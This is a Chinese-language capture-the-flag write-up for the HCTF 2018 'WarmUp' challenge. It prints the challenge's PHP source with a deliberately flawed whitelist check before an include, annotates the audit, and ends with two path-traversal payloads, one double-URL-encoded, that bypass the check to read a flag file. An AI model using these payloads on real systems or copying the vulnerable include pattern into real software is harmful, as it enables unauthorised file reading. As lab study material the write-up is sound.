[HCTF 2018]WarmUp
进去只有一张图片,查看源代码 发现
进入source.php得到如下代码
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>代码审计
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])传入一个’file’,满足不为空,是字符串,满足checkFile函数,就能被包含
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {//不为空,是字符串的通过
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {//检查是否在白名单
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')//找到第一个'?'的索引
);//截取'?'前面的字符
if (in_array($_page, $whitelist)) {//检查截取后是否在白名单
return true;
}
$_page = urldecode($page);//url解码
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}分析后得到函数功能 只需要满足一个ture就能进入包含文件
进入hint.php 得到提示flag not here, and flag in ffffllllaaaagggg
猜测是目录遍历
这里构造payload
/source.php?file=hint.php?../../../../../ffffllllaaaagggg
或者
/source.php?file=hint.php%253F../../../../../ffffllllaaaagggg成功了
